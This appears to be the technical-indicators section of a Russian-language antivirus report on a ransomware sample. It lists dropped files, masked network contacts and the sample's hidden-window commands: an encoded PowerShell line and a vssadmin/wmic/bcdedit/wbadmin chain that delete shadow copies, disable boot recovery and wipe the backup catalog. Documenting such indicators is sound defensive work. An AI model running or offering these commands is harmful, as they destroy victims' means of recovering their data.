Техническая информация
- Средство контроля пользовательских учетных записей (UAC)
- <DRIVERS>\etc\host
- <Текущая директория>\libeay32.dll
- <Текущая директория>\ssleay32.dll
- %PROGRAMDATA%\tvpssuq5mtdcnem4rta3x19uyxjpacgymsbnyxj0idiwmjagq3vtyxj0zxnpkv9fu2fhdcgxmc0xmy01msk=
- %PROGRAMDATA%\tvpssuq5mtdcnem4rta3x19uyxjpacgymsbnyxj0idiwmjagq3vtyxj0zxnpkv9fu2fhdcgxmc0xmy01msk=
- 'mz###enge.ga':443
- 'ap#.#pify.org':443
- 'ap#.#b-ip.com':443
- DNS ASK mz###enge.ga
- DNS ASK ap#.#pify.org
- DNS ASK ap#.#b-ip.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog ...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog ...
- '<SYSTEM32>\vssvc.exe'